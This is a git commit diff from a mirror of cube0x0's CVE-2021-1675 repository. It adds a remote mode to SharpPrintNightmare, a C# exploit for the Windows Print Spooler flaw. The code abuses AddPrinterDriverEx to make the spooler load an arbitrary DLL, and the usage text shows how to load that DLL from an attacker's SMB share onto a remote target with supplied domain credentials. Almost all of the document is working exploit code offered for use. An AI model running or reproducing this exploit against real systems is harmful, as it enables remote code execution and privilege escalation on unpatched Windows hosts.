mirror of https://github.com/cube0x0/CVE-2021-1675.git synced 2025-07-06 01:41:12 +01:00

c# remote version

Signed-off-by: cube0x0 <vidfelt@protonmail.com>
cube0x0 2021-07-01 23:30:25 +02:00
parent 2f6ae233b0
commit b74cb00b1b
6 changed files with 223 additions and 19 deletions


@ -2,6 +2,7 @@
using System.ComponentModel;
using System.IO;
using System.Runtime.InteropServices;
using Tools;
namespace SharpPrintNightmare
{
@ -45,30 +46,81 @@ namespace SharpPrintNightmare
static void Main(string[] args)
{
string dllpath;
string pDriverPath = "";
string path = null;
//network credentials wont be used for LPE
string domain = "NeverGonnaGiveYouUp";
string user = "NeverGonnaLetYouDown";
string password = "NeverGonnaRunAroundAndDesertYou";
if (args == null || args.Length == 0)
{
Console.WriteLine("Need an argument containing the dll path");
Console.WriteLine(".\\SharpPrintNightmare.exe C:\\addCube.dll");
Console.WriteLine("-Locally");
Console.WriteLine(" .\\SharpPrintNightmare.exe C:\\addCube.dll");
Console.WriteLine(" .\\SharpPrintNightmare.exe 'C:\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL'");
Console.WriteLine("-Remote using current context");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20'");
Console.WriteLine("-Remote using runas");
Console.WriteLine(" .\\SharpPrintNightmare.exe '\\\\192.168.1.215\\smb\\addCube.dll' 'C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL' '\\\\192.168.1.20' hackit.local domain_user Pass123");
Environment.Exit(0);
}
dllpath = args[0];
Console.WriteLine("[*] Try 1...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 2...");
addPrinter(dllpath);
Console.WriteLine("[*] Try 3...");
addPrinter(dllpath);
if(args.Length > 1)
{
pDriverPath = args[1];
}
else
{
DRIVER_INFO_2[] drivers = getDrivers();
foreach (DRIVER_INFO_2 driver in drivers)
{
//Console.WriteLine(driver.pDriverPath); //debug
if (driver.pDriverPath.ToLower().Contains("filerepository"))
{
pDriverPath = driver.pDriverPath;
break;
}
}
//lucky shot
if (pDriverPath == "")
{
pDriverPath = drivers[0].pDriverPath;
}
pDriverPath = Directory.GetParent(pDriverPath).FullName + "\\UNIDRV.DLL";
}
if (args.Length > 2)
{
path = args[2];
}
if (args.Length > 3)
{
domain = args[3];
user = args[4];
password = args[5];
}
//runas /netonly
using (new Impersonator.Impersonation(domain, user, password))
{
Console.WriteLine("[*] Try 1...");
addPrinter(dllpath, pDriverPath, path);
Console.WriteLine("[*] Try 2...");
addPrinter(dllpath, pDriverPath, path);
Console.WriteLine("[*] Try 3...");
addPrinter(dllpath, pDriverPath, path);
}
}
static void addPrinter(string dllpath)
static void addPrinter(string dllpath, string pDriverPath, string path = null)
{
DRIVER_INFO_2[] drivers = getDrivers();
string pDriverPath = Directory.GetParent(drivers[0].pDriverPath).FullName + "\\UNIDRV.DLL";
Console.WriteLine($"[*] pDriverPath Found {pDriverPath}");
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL"; // 2019 debug
//pDriverPath = "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_addb31f9bff9e936\\Amd64\\UNIDRV.DLL"; // 2016 debug
Console.WriteLine($"[*] pDriverPath {pDriverPath}");
Console.WriteLine($"[*] Executing {dllpath}");
//DRIVER_INFO_2 Level2 = drivers[0];
//DRIVER_INFO_2 Level2 = drivers[0]; // debug
DRIVER_INFO_2 Level2 = new DRIVER_INFO_2();
Level2.cVersion = 3;
Level2.pConfigFile = "C:\\Windows\\System32\\kernelbase.dll";
@ -85,7 +137,7 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt, flags);
AddPrinterDriverEx(path, 2, pnt, flags);
Console.WriteLine("[*] Stage 0: " + Marshal.GetLastWin32Error());
Marshal.FreeHGlobal(pnt);
@ -98,10 +150,10 @@ namespace SharpPrintNightmare
Marshal.StructureToPtr(Level2, pnt2, false);
//call AddPrinterDriverEx
AddPrinterDriverEx(null, 2, pnt2, flags);
AddPrinterDriverEx(path, 2, pnt2, flags);
int errorcode = Marshal.GetLastWin32Error();
Marshal.FreeHGlobal(pnt2);
if(errorcode == 0)
if (errorcode == 0)
{
Console.WriteLine($"[*] Stage {i}: " + errorcode);
Console.WriteLine($"[+] Exploit Completed");
@ -110,11 +162,13 @@ namespace SharpPrintNightmare
}
}
static DRIVER_INFO_2[] getDrivers()
static DRIVER_INFO_2[] getDrivers(string path = null)
{
uint cbNeeded = 0;
uint cReturned = 0;
if (EnumPrinterDrivers(null, null, 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
//path = "\\\\192.168.1.20";
if (EnumPrinterDrivers(path, "Windows x64", 2, IntPtr.Zero, 0, ref cbNeeded, ref cReturned))
{
//succeeds, but shouldn't, because buffer is zero (too small)!
throw new Exception("EnumPrinters should fail!");
@ -128,7 +182,7 @@ namespace SharpPrintNightmare
}
IntPtr pAddr = Marshal.AllocHGlobal((int)cbNeeded);
if (EnumPrinterDrivers(null, null, 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
if (EnumPrinterDrivers(path, "Windows x64", 2, pAddr, cbNeeded, ref cbNeeded, ref cReturned))
{
DRIVER_INFO_2[] printerInfo2 = new DRIVER_INFO_2[cReturned];
long offset;